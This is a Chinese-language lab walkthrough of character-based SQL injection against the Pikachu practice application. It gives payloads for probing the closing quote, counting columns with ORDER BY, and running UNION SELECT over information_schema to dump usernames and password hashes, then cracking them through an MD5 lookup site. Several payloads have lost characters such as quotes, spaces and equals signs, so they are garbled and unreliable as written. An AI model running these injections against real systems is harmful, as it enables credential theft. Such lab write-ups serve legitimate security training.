一、获取账户名1.通过字符型注入上面的数字型注入可以得到几个账户名,这里我们选择3号账户名kobe2.返回字符型注入界面输入kobe这个账户名二、判断闭合符号1.在账户名的后面输入一个反斜杠通过查看报错来验证闭合方式kobe\2.主要看这个内容可以判断出闭合符合是单引号‘三、开始注入1.判读回显位1试试是不是3位kobeorder by 3#报错了说明不是3位2试试是不是2位kobeorder by 2 #数据正常输出代表就是2位2.可以开始用联合查询来获取用户数据了(1)确定回显位可以看到12都可以显示内容kobeunion select 1,2#2查询数据库名kobeunion select 1,database()#得到数据库名“pikachu”(3)查询这个库的表名kobeunion select 1,table_name from information_schema.tables where table_schemapikachu#4查询users表的列名kobeunion select 1,column_name from information_schema.columns where table_schemapikachu and table_nameusers#(5)从pikachu.users中查询password和username这2个我们需要内容kobeunion select username,password from pikachu.users#3.对密码进行MD5解密MD5的解码网站是https://www.cmd5.com/得到明文密码123456